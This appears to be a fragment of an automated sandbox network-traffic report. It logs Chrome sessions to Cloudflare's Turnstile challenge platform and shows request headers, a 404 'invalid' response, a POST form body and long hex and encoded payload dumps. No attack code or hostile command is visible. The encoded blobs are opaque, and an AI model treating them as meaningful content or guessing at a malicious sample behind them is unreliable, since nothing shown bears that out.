                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC1369INData Raw: 6d 48 31 36 6b 61 65 72 68 5a 5a 67 62 4a 32 79 5a 4b 4b 4b 67 34 69 4b 6b 70 42 77 74 4c 79 4a 73 35 64 37 76 63 47 44 6d 5a 43 34 78 4a 79 56 6e 37 4f 67 70 35 37 50 75 72 47 74 78 39 44 46 7a 36 57 72 75 64 61 37 33 5a 69 58 78 37 50 54 6d 4d 4c 4f 33 72 57 65 6d 74 79 38 77 39 54 62 77 61 7a 6e 34 75 50 41 73 72 33 76 73 50 61 79 7a 4c 76 5a 2b 65 30 41 33 39 62 4f 32 38 2f 66 38 39 37 6d 41 2b 66 6e 77 2b 50 68 43 76 30 44 2f 4d 72 71 38 4e 2f 34 37 67 2f 5a 32 4e 54 34 46 78 37 77 47 69 4c 7a 44 68 73 65 34 52 66 34 47 75 63 68 44 53 58 6c 4c 53 55 52 37 77 6b 41 43 54 49 50 38 77 54 37 4b 68 30 32 41 42 67 41 4f 69 46 42 48 53 51 67 47 55 55 39 51 55 30 46 53 6b 52 4f 43 30 78 46 51 45 63 79 55 68 63 35 52 30 77 39 58 6a 67 2b 57 54 6b 74 4e 55 56
                                                                                                                                                                                                                                                          Data Ascii: mH16kaerhZZgbJ2yZKKKg4iKkpBwtLyJs5d7vcGDmZC4xJyVn7Ogp57PurGtx9DFz6Wruda73ZiXx7PTmMLO3rWemty8w9Tbwazn4uPAsr3vsPayzLvZ+e0A39bO28/f897mA+fnw+PhCv0D/Mrq8N/47g/Z2NT4Fx7wGiLzDhse4Rf4GuchDSXlLSUR7wkACTIP8wT7Kh02ABgAOiFBHSQgGUU9QU0FSkROC0xFQEcyUhc5R0w9Xjg+WTktNUV
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC1369INData Raw: 6d 53 64 6a 37 46 76 6d 6e 79 47 6f 6e 46 78 6d 5a 57 4a 76 4b 32 63 75 6e 32 39 71 33 2b 57 75 61 4e 2f 77 4b 65 6a 66 4b 6a 43 69 4d 79 6a 68 71 47 66 77 61 33 45 74 4c 53 73 6b 61 75 52 78 4c 4c 55 79 4c 47 71 6d 64 65 77 35 4a 79 35 31 37 62 62 31 4c 7a 73 78 75 61 37 75 72 72 49 77 72 2f 4b 30 38 61 32 34 75 66 4a 32 65 62 36 39 74 66 6a 75 62 34 42 35 66 34 4a 39 77 7a 6e 79 67 72 6c 35 4f 58 65 33 39 41 4c 37 52 66 6e 38 2b 2f 6a 7a 52 6b 4b 49 4e 59 57 41 53 50 72 48 2f 77 59 41 66 6f 6d 39 67 7a 35 48 77 77 5a 41 69 48 76 48 67 49 7a 4b 42 4c 75 4b 44 76 31 42 68 4d 2f 48 79 6b 33 52 43 4d 58 4c 30 59 6e 51 52 56 4b 4b 7a 34 2f 54 69 39 43 4d 54 34 73 4d 42 38 6e 51 52 55 56 47 79 51 6c 54 31 6f 77 4d 7a 51 5a 51 6c 74 53 57 78 70 55 48 45 6f 31
                                                                                                                                                                                                                                                          Data Ascii: mSdj7FvmnyGonFxmZWJvK2cun29q3+WuaN/wKejfKjCiMyjhqGfwa3EtLSskauRxLLUyLGqmdew5Jy517bb1Lzsxua7urrIwr/K08a24ufJ2eb69tfjub4B5f4J9wznygrl5OXe39AL7Rfn8+/jzRkKINYWASPrH/wYAfom9gz5HwwZAiHvHgIzKBLuKDv1BhM/Hyk3RCMXL0YnQRVKKz4/Ti9CMT4sMB8nQRUVGyQlT1owMzQZQltSWxpUHEo1
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC1369INData Raw: 35 38 69 49 46 75 63 59 71 6a 75 6e 4f 4b 75 72 44 42 6e 5a 65 4f 6e 71 37 45 75 73 65 55 6c 38 79 38 6e 4b 79 67 76 73 61 77 6d 38 4f 6c 70 4b 58 49 72 62 50 52 31 38 2b 70 6b 62 65 65 71 72 69 67 30 63 2b 39 30 64 71 2f 36 64 72 58 70 75 71 75 78 2f 44 45 34 63 66 54 77 2f 4f 72 75 73 7a 61 74 66 6e 75 32 63 44 7a 30 2f 34 48 39 66 37 31 33 37 7a 46 2b 75 62 65 34 74 33 79 36 2b 67 41 35 51 58 6d 30 42 55 45 38 64 54 79 43 50 48 64 39 42 6a 34 49 52 37 6b 38 79 4d 56 48 41 6b 70 36 77 6f 4b 37 53 73 30 42 75 30 78 43 67 6b 30 45 43 67 56 2b 53 62 77 4f 66 77 55 41 52 34 42 47 78 59 2f 53 51 70 4c 52 6b 59 35 4f 45 4e 4f 4f 79 34 6a 55 52 52 59 4a 52 45 73 46 46 67 5a 4d 6b 68 59 58 42 52 58 58 32 41 6d 49 56 45 67 55 30 5a 66 62 53 31 6b 52 32 70 71 4c
                                                                                                                                                                                                                                                          Data Ascii: 58iIFucYqjunOKurDBnZeOnq7EuseUl8y8nKygvsawm8OlpKXIrbPR18+pkbeeqrig0c+90dq/6drXpuqux/DE4cfTw/Oruszatfnu2cDz0/4H9f7137zF+ube4t3y6+gA5QXm0BUE8dTyCPHd9Bj4IR7k8yMVHAkp6woK7Ss0Bu0xCgk0ECgV+SbwOfwUAR4BGxY/SQpLRkY5OENOOy4jURRYJREsFFgZMkhYXBRXX2AmIVEgU0ZfbS1kR2pqL
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC1369INData Raw: 69 64 71 32 78 66 72 71 76 6b 62 61 4e 78 4b 57 54 77 72 69 2f 75 72 65 36 68 38 33 4b 78 63 66 4a 69 63 4b 70 71 39 6a 58 72 4c 6d 6d 31 61 2b 58 33 39 75 62 75 61 7a 69 7a 5a 2f 67 34 61 66 41 70 39 61 72 35 65 37 76 36 75 4c 4a 33 61 36 76 77 2b 6a 5a 7a 63 7a 71 32 37 66 52 38 4e 4b 2f 7a 76 48 54 76 2f 50 34 2f 72 7a 54 43 38 66 6b 79 77 33 36 33 38 30 4f 36 50 41 54 47 4f 7a 35 35 67 63 49 42 39 6f 53 46 75 49 66 46 50 55 62 38 53 6b 4b 39 79 63 64 4a 42 38 63 48 2b 73 79 4c 79 6f 73 4c 75 30 6e 44 68 45 33 4e 69 62 30 45 54 73 37 47 50 30 76 42 44 73 45 51 68 77 46 47 45 77 49 48 68 35 4e 49 67 39 52 50 6a 59 78 4b 55 64 55 54 79 56 47 50 6c 63 77 56 6c 67 34 49 30 35 48 4a 44 70 57 4a 54 59 33 5a 6b 41 6f 63 58 46 62 50 43 35 76 58 6a 56 42 59 7a
                                                                                                                                                                                                                                                          Data Ascii: idq2xfrqvkbaNxKWTwri/ure6h83KxcfJicKpq9jXrLmm1a+X39ubuazizZ/g4afAp9ar5e7v6uLJ3a6vw+jZzczq27fR8NK/zvHTv/P4/rzTC8fkyw36380O6PATGOz55gcIB9oSFuIfFPUb8SkK9ycdJB8cH+syLyosLu0nDhE3Nib0ETs7GP0vBDsEQhwFGEwIHh5NIg9RPjYxKUdUTyVGPlcwVlg4I05HJDpWJTY3ZkAocXFbPC5vXjVBYz
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC1369INData Raw: 71 70 7a 42 76 5a 69 63 77 38 4c 42 78 73 54 4c 69 73 36 47 79 6f 2b 67 30 73 36 39 31 74 44 53 71 39 75 71 31 63 58 65 33 39 72 5a 33 74 37 65 7a 61 50 6c 34 4b 6a 57 35 75 57 72 75 4f 37 72 78 4c 7a 79 37 4c 4b 7a 39 2f 65 32 73 2f 76 31 39 66 72 38 2b 72 2f 4d 75 76 33 74 43 4e 59 43 38 75 41 48 42 63 72 4c 43 51 72 35 78 41 34 4f 36 51 4d 55 45 67 50 6b 30 68 63 57 32 78 6b 62 33 68 38 64 4a 4f 4c 6a 4a 43 4c 6e 39 43 77 6e 46 75 41 77 4b 79 6f 30 41 79 34 76 41 54 49 7a 49 6a 63 37 4e 78 45 56 4f 6a 73 38 4c 30 41 2f 4c 6b 4e 42 51 6b 4d 56 52 30 63 4c 53 30 31 51 44 77 56 4e 55 43 67 4a 56 6c 4e 53 57 78 4e 56 48 44 6f 76 57 6b 73 31 59 6c 34 6a 49 47 52 69 59 68 31 70 62 43 73 68 62 47 6b 76 4c 47 39 76 62 30 6c 30 63 6a 6c 6e 65 6e 55 38 54 54 64
                                                                                                                                                                                                                                                          Data Ascii: qpzBvZicw8LBxsTLis6Gyo+g0s691tDSq9uq1cXe39rZ3t7ezaPl4KjW5uWruO7rxLzy7LKz9/e2s/v19fr8+r/Muv3tCNYC8uAHBcrLCQr5xA4O6QMUEgPk0hcW2xkb3h8dJOLjJCLn9CwnFuAwKyo0Ay4vATIzIjc7NxEVOjs8L0A/LkNBQkMVR0cLS01QDwVNUCgJVlNSWxNVHDovWks1Yl4jIGRiYh1pbCshbGkvLG9vb0l0cjlnenU8TTd
                                                                                                                                                                                                                                                          2024-12-20 23:36:05 UTC1369INData Raw: 72 76 42 6d 4b 76 4c 6f 62 71 38 77 38 6d 67 73 39 4f 70 77 73 37 55 71 36 32 71 31 4d 62 4e 32 39 36 65 31 37 4c 64 7a 38 44 49 30 65 50 41 34 75 75 71 37 75 76 76 77 75 58 76 38 72 4c 72 78 76 48 68 74 4d 66 37 75 50 71 36 36 65 76 59 2b 67 54 43 33 64 44 2b 41 66 37 37 43 2f 58 6f 38 41 6a 6c 34 41 55 55 36 51 4d 50 46 65 73 4d 36 68 58 77 44 78 55 67 33 67 2f 65 48 43 41 54 48 43 58 33 35 50 59 6b 47 42 73 6f 4d 41 59 66 4a 7a 45 49 45 67 63 77 44 53 73 74 50 50 6f 56 2b 6a 63 38 4c 7a 52 42 46 41 45 54 51 55 51 33 48 30 77 64 50 7a 78 45 53 6b 38 30 55 53 51 52 49 30 39 55 52 30 68 51 56 6c 74 41 59 44 5a 50 55 46 68 65 5a 30 68 6c 4f 43 55 33 59 79 31 62 58 47 52 71 63 31 52 30 53 6d 4e 6b 62 48 49 30 58 48 6c 4d 4f 55 74 34 56 6d 39 77 65 48 35 41
                                                                                                                                                                                                                                                          Data Ascii: rvBmKvLobq8w8mgs9Opws7Uq62q1MbN296e17Ldz8DI0ePA4uuq7uvvwuXv8rLrxvHhtMf7uPq66evY+gTC3dD+Af77C/Xo8Ajl4AUU6QMPFesM6hXwDxUg3g/eHCATHCX35PYkGBsoMAYfJzEIEgcwDSstPPoV+jc8LzRBFAETQUQ3H0wdPzxESk80USQRI09UR0hQVltAYDZPUFheZ0hlOCU3Yy1bXGRqc1R0SmNkbHI0XHlMOUt4Vm9weH5A


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          22192.168.2.549769104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:36:06 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:07 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:06 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cf-chl-out: 7F0/pDSQSbTkw548yn9HA/XnXL5Mj+Vgrs4=$EaMn5VI9x5h6mS2b
                                                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5373e3aeff2361-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:36:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                          Data Ascii: invalid


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          23192.168.2.549775104.18.95.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:36:08 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Content-Length: 34619
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          CF-Challenge: Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:08 UTC16384OUTData Raw: 76 5f 38 66 35 33 37 33 38 66 35 63 66 61 31 35 62 62 3d 25 32 62 4f 67 49 71 69 35 45 38 70 4f 35 38 6e 45 35 63 51 6c 51 59 6e 68 35 57 51 71 49 6e 24 35 68 45 35 64 51 70 24 78 49 51 4f 35 56 51 42 33 36 24 6e 44 79 48 51 66 51 35 49 6e 4f 24 51 74 68 51 77 24 35 70 51 45 24 24 6f 67 67 51 78 4f 35 32 51 4c 37 43 24 51 4c 24 51 6d 42 51 67 53 51 58 51 77 33 53 6e 4c 72 49 69 61 70 51 78 55 73 49 52 51 2d 71 54 69 51 79 49 51 62 78 51 2b 55 73 63 24 33 49 4a 32 48 41 4c 34 68 77 33 49 51 41 55 51 38 34 49 35 41 51 77 53 51 76 49 51 63 69 49 69 63 38 74 75 5a 59 51 39 50 45 45 38 4e 43 53 66 78 51 35 76 5a 45 42 75 6f 44 24 50 33 51 4c 74 48 52 69 49 38 45 51 38 51 39 6d 59 73 34 66 39 72 51 70 53 52 48 52 76 6e 6b 70 72 62 62 24 69 74 4d 24 57 5a 6b 74
                                                                                                                                                                                                                                                          Data Ascii: v_8f53738f5cfa15bb=%2bOgIqi5E8pO58nE5cQlQYnh5WQqIn$5hE5dQp$xIQO5VQB36$nDyHQfQ5InO$QthQw$5pQE$$oggQxO52QL7C$QL$QmBQgSQXQw3SnLrIiapQxUsIRQ-qTiQyIQbxQ+Usc$3IJ2HAL4hw3IQAUQ84I5AQwSQvIQciIic8tuZYQ9PEE8NCSfxQ5vZEBuoD$P3QLtHRiI8EQ8Q9mYs4f9rQpSRHRvnkprbb$itM$WZkt
                                                                                                                                                                                                                                                          2024-12-20 23:36:08 UTC16384OUTData Raw: 69 68 2b 49 24 63 39 6b 4a 51 69 4b 51 52 24 32 4c 75 67 68 42 39 7a 32 50 78 58 51 78 47 4e 6b 4a 66 24 4b 51 6e 49 35 68 51 62 51 35 43 35 48 51 76 24 75 79 38 6c 51 70 51 70 34 6f 6b 64 72 38 68 43 6f 41 51 35 49 51 77 35 44 51 4e 79 6e 39 73 31 51 62 33 73 68 51 4e 51 32 51 35 44 35 39 38 6e 24 75 72 35 52 51 30 24 39 4f 35 4a 51 67 79 35 4d 35 69 79 74 79 75 48 51 66 51 6e 79 35 39 51 65 51 76 79 68 49 69 43 51 44 51 70 51 69 65 47 68 51 75 49 35 44 51 4d 51 68 79 51 48 51 76 24 75 67 35 6c 4f 6e 38 35 48 51 45 51 5a 49 68 43 24 52 51 35 49 39 71 49 48 51 2b 49 69 4f 51 64 4e 6c 51 65 68 51 58 51 69 4e 51 67 39 2b 51 4b 43 35 51 51 4a 51 24 79 35 4c 51 38 51 6f 79 68 38 69 75 51 67 43 6e 45 51 45 51 70 79 51 49 72 52 67 6b 47 79 37 35 59 51 2b 24 69
                                                                                                                                                                                                                                                          Data Ascii: ih+I$c9kJQiKQR$2LughB9z2PxXQxGNkJf$KQnI5hQbQ5C5HQv$uy8lQpQp4okdr8hCoAQ5IQw5DQNyn9s1Qb3shQNQ2Q5D598n$ur5RQ0$9O5JQgy5M5iytyuHQfQny59QeQvyhIiCQDQpQieGhQuI5DQMQhyQHQv$ug5lOn85HQEQZIhC$RQ5I9qIHQ+IiOQdNlQehQXQiNQg9+QKC5QQJQ$y5LQ8Qoyh8iuQgCnEQEQpyQIrRgkGy75YQ+$i
                                                                                                                                                                                                                                                          2024-12-20 23:36:08 UTC1851OUTData Raw: 39 4f 73 6c 44 4d 7a 31 65 33 42 6d 43 67 68 45 51 45 49 35 51 69 31 5a 39 52 58 62 6c 67 51 69 37 39 31 75 71 35 55 51 5a 49 75 4d 49 36 49 77 77 69 24 51 34 51 72 33 75 6f 5a 7a 2b 63 24 51 4c 35 69 38 37 67 69 64 30 7a 68 47 6a 52 4b 75 71 36 6d 51 68 6b 4f 66 39 38 71 77 36 77 52 51 30 6c 45 2d 49 4c 4e 4a 43 6c 7a 4c 4a 37 6a 51 6e 70 39 75 51 74 24 71 58 2b 7a 51 65 6a 55 56 48 51 4f 69 49 31 32 76 50 52 38 75 77 6b 73 42 74 49 4e 4c 39 6a 7a 24 76 24 6e 30 52 78 51 6b 71 31 67 51 63 41 64 67 6e 67 51 37 48 32 4c 48 43 24 45 44 36 24 64 4b 51 66 38 24 62 45 77 33 54 51 75 31 6b 77 56 44 76 36 68 61 31 35 56 47 39 24 39 51 35 2b 48 64 6b 79 65 75 74 51 6f 61 4c 2b 75 37 6f 4e 4f 45 6d 32 2d 55 6d 5a 56 49 35 24 4f 2d 36 77 67 51 2b 79 69 79 35 37 74
                                                                                                                                                                                                                                                          Data Ascii: 9OslDMz1e3BmCghEQEI5Qi1Z9RXblgQi791uq5UQZIuMI6Iwwi$Q4Qr3uoZz+c$QL5i87gid0zhGjRKuq6mQhkOf98qw6wRQ0lE-ILNJClzLJ7jQnp9uQt$qX+zQejUVHQOiI12vPR8uwksBtINL9jz$v$n0RxQkq1gQcAdgngQ7H2LHC$ED6$dKQf8$bEw3TQu1kwVDv6ha15VG9$9Q5+HdkyeutQoaL+u7oNOEm2-UmZVI5$O-6wgQ+yiy57t
                                                                                                                                                                                                                                                          2024-12-20 23:36:09 UTC135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:09 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 4544
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-12-20 23:36:09 UTC1494INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 76 78 49 6c 79 54 63 74 5a 68 74 41 50 35 79 4e 74 4f 68 4b 6b 70 44 79 47 46 63 4b 68 6a 50 6b 49 35 59 76 45 57 64 36 63 56 64 42 46 4a 56 33 68 37 55 75 75 43 79 46 55 7a 35 31 47 37 49 69 6f 42 69 61 4f 42 35 5a 2f 49 6d 75 73 36 4d 77 6d 2f 66 67 64 45 56 61 56 57 74 61 2b 6b 31 2f 63 42 2f 69 67 48 61 34 47 33 4c 4a 67 43 48 41 44 33 47 61 38 4e 4f 6c 6e 2b 77 7a 78 6b 4c 4d 69 55 33 45 41 43 50 58 59 4c 6b 32 6d 35 6f 62 2f 52 7a 66 47 66 77 72 70 6c 6d 33 51 4e 4d 64 39 6e 62 49 64 65 67 34 50 4d 47 6c 58 54 64 38 4d 77 37 36 47 57 34 6d 35 73 75 52 52 35 6f 43 48 4c 44 69 66 38 47 77 41 63 2f 30 30 75 39 6b 63 6a 47 41 34 68 4f 68 4e 53 6d 52 7a 58 2b 50 70 51 69 6f 36 76 55 37 46 6c 68 4c 6b 6f 61 6a 44
                                                                                                                                                                                                                                                          Data Ascii: cf-chl-out-s: vxIlyTctZhtAP5yNtOhKkpDyGFcKhjPkI5YvEWd6cVdBFJV3h7UuuCyFUz51G7IioBiaOB5Z/Imus6Mwm/fgdEVaVWta+k1/cB/igHa4G3LJgCHAD3Ga8NOln+wzxkLMiU3EACPXYLk2m5ob/RzfGfwrplm3QNMd9nbIdeg4PMGlXTd8Mw76GW4m5suRR5oCHLDif8GwAc/00u9kcjGA4hOhNSmRzX+PpQio6vU7FlhLkoajD
                                                                                                                                                                                                                                                          2024-12-20 23:36:09 UTC1109INData Raw: 58 32 4e 7a 55 34 36 54 5a 32 52 6a 68 31 70 75 58 4a 6c 62 57 34 46 33 63 33 74 31 62 33 4f 53 65 6f 4b 6f 64 6e 68 74 6e 57 71 68 6b 33 43 52 72 4b 2b 4d 73 4a 43 62 71 61 65 36 75 62 69 64 76 72 32 38 6d 38 57 45 68 5a 36 46 66 4b 4b 4a 77 70 6d 2f 6a 35 72 50 6e 74 57 56 30 36 2b 6a 70 62 47 79 78 4a 61 55 7a 36 2b 35 34 70 37 6b 75 72 43 67 30 4e 48 66 32 62 37 74 35 71 32 38 38 64 76 72 71 38 50 71 36 72 4f 76 39 50 4f 7a 2b 37 44 56 2f 76 72 56 33 51 45 46 32 74 76 77 38 64 6e 38 7a 41 33 4c 7a 65 49 51 30 52 54 4c 46 68 45 51 30 78 55 55 38 77 58 2b 32 41 37 76 48 66 59 43 32 78 38 52 2f 4f 50 6b 39 4f 67 71 48 53 59 75 4c 7a 41 69 36 65 76 31 4e 77 66 31 45 54 51 6c 42 69 63 4e 38 54 49 4c 50 78 67 34 4a 51 45 6b 4a 54 56 4c 48 30 6b 6e 4a 45 63
                                                                                                                                                                                                                                                          Data Ascii: X2NzU46TZ2Rjh1puXJlbW4F3c3t1b3OSeoKodnhtnWqhk3CRrK+MsJCbqae6ubidvr28m8WEhZ6FfKKJwpm/j5rPntWV06+jpbGyxJaUz6+54p7kurCg0NHf2b7t5q288dvrq8Pq6rOv9POz+7DV/vrV3QEF2tvw8dn8zA3LzeIQ0RTLFhEQ0xUU8wX+2A7vHfYC2x8R/OPk9OgqHSYuLzAi6ev1Nwf1ETQlBicN8TILPxg4JQEkJTVLH0knJEc
                                                                                                                                                                                                                                                          2024-12-20 23:36:09 UTC1369INData Raw: 71 71 4c 77 35 53 58 32 62 6d 53 73 6f 2b 56 7a 61 69 58 77 70 57 76 35 71 48 44 74 4d 48 72 35 63 54 75 72 4b 69 69 79 38 4c 6b 77 63 33 4b 34 63 54 45 2b 4c 6d 36 2f 50 4f 36 76 39 7a 41 75 64 54 78 43 4d 48 67 39 38 6e 38 7a 41 7a 74 7a 74 73 52 30 51 50 63 42 65 59 48 34 4d 76 5a 35 4f 51 64 36 52 76 76 48 78 55 45 38 66 34 6c 41 50 55 5a 41 75 73 45 48 51 37 6f 43 41 67 78 49 2f 77 30 37 4f 2f 32 45 44 7a 37 44 43 73 65 2f 52 63 4b 43 7a 51 56 4d 7a 42 45 49 42 49 6a 41 69 51 58 44 69 73 68 47 79 64 44 4c 46 51 75 56 77 73 6a 57 42 67 54 4b 46 55 33 4c 44 6c 41 4c 52 63 77 50 6d 63 6e 52 6a 70 6d 52 57 74 73 4b 54 42 7a 59 53 39 46 50 30 4d 32 54 31 46 44 55 55 56 61 55 6a 4a 4b 62 34 41 2b 52 48 56 6e 55 56 6c 56 52 55 70 4e 5a 30 71 43 58 34 52 75
                                                                                                                                                                                                                                                          Data Ascii: qqLw5SX2bmSso+VzaiXwpWv5qHDtMHr5cTurKiiy8Lkwc3K4cTE+Lm6/PO6v9zAudTxCMHg98n8zAztztsR0QPcBeYH4MvZ5OQd6RvvHxUE8f4lAPUZAusEHQ7oCAgxI/w07O/2EDz7DCse/RcKCzQVMzBEIBIjAiQXDishGydDLFQuVwsjWBgTKFU3LDlALRcwPmcnRjpmRWtsKTBzYS9FP0M2T1FDUUVaUjJKb4A+RHVnUVlVRUpNZ0qCX4Ru
                                                                                                                                                                                                                                                          2024-12-20 23:36:09 UTC1369INData Raw: 54 56 74 74 6a 58 30 4d 43 63 75 64 47 36 70 63 2b 35 73 39 2b 39 71 61 57 2f 74 38 54 61 36 39 4c 64 37 73 43 32 73 75 58 78 37 75 76 36 36 4c 72 32 38 74 47 2f 2f 76 62 61 31 72 6b 47 43 65 54 62 34 65 34 49 2b 2f 6e 66 33 65 72 4b 33 77 55 51 79 75 55 56 47 42 30 4c 36 52 7a 37 44 2b 7a 37 32 68 76 6d 42 50 49 6a 2f 67 30 41 39 77 6b 50 4c 43 34 6c 48 67 58 76 37 7a 51 72 44 77 50 74 4f 6a 30 5a 45 52 58 39 4e 7a 41 62 4f 42 63 6d 53 52 59 37 48 6a 6b 49 43 77 63 2f 44 54 41 53 52 53 56 4c 4a 46 59 71 55 68 4a 4e 4c 56 6f 65 55 44 45 63 4d 6c 51 78 50 6a 4a 4a 55 30 4a 6b 53 45 49 2f 4c 6d 55 37 53 6b 63 7a 51 6c 64 59 63 30 5a 79 66 47 67 34 56 56 68 75 50 48 4e 77 63 56 53 43 68 48 4a 5a 68 32 78 31 54 46 64 6f 53 6d 6c 67 69 57 2b 52 6b 5a 47 58 61
                                                                                                                                                                                                                                                          Data Ascii: TVttjX0MCcudG6pc+5s9+9qaW/t8Ta69Ld7sC2suXx7uv66Lr28tG//vba1rkGCeTb4e4I+/nf3erK3wUQyuUVGB0L6Rz7D+z72hvmBPIj/g0A9wkPLC4lHgXv7zQrDwPtOj0ZERX9NzAbOBcmSRY7HjkICwc/DTASRSVLJFYqUhJNLVoeUDEcMlQxPjJJU0JkSEI/LmU7SkczQldYc0ZyfGg4VVhuPHNwcVSChHJZh2x1TFdoSmlgiW+RkZGXa
                                                                                                                                                                                                                                                          2024-12-20 23:36:09 UTC697INData Raw: 71 74 36 75 6b 31 71 58 56 74 70 2f 47 34 35 37 73 70 63 6d 6d 37 75 54 54 70 75 54 6b 35 4e 48 44 79 74 53 36 73 39 4c 65 30 50 48 57 31 39 41 44 30 75 66 49 43 64 72 73 32 4f 62 75 2f 4d 59 45 37 64 48 64 33 52 62 6a 35 50 50 33 35 4f 33 31 31 4e 33 34 36 51 4c 63 34 78 50 67 4a 39 6f 46 4a 51 6e 2b 48 66 6f 4c 41 53 49 48 38 66 49 7a 42 79 6a 34 45 66 45 76 43 54 33 30 2b 51 34 63 46 77 30 52 4f 42 63 67 46 45 63 6e 4c 41 31 4e 43 55 77 5a 55 77 6f 68 4a 69 45 53 45 7a 41 6a 4a 6c 6f 63 54 43 73 57 4c 57 45 65 50 42 73 2f 4e 30 6b 34 51 6a 70 72 4f 6b 64 4c 59 54 6f 38 50 32 77 30 50 6e 56 4f 53 57 64 74 61 45 31 57 57 32 74 51 57 56 4e 7a 54 58 56 66 58 56 64 68 61 32 64 57 65 6b 70 43 61 59 42 4e 6b 47 5a 76 62 33 42 58 55 46 5a 77 61 35 74 34 61 57
                                                                                                                                                                                                                                                          Data Ascii: qt6uk1qXVtp/G457spcmm7uTTpuTk5NHDytS6s9Le0PHW19AD0ufICdrs2Obu/MYE7dHd3Rbj5PP35O311N346QLc4xPgJ9oFJQn+HfoLASIH8fIzByj4EfEvCT30+Q4cFw0ROBcgFEcnLA1NCUwZUwohJiESEzAjJlocTCsWLWEePBs/N0k4QjprOkdLYTo8P2w0PnVOSWdtaE1WW2tQWVNzTXVfXVdha2dWekpCaYBNkGZvb3BXUFZwa5t4aW


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
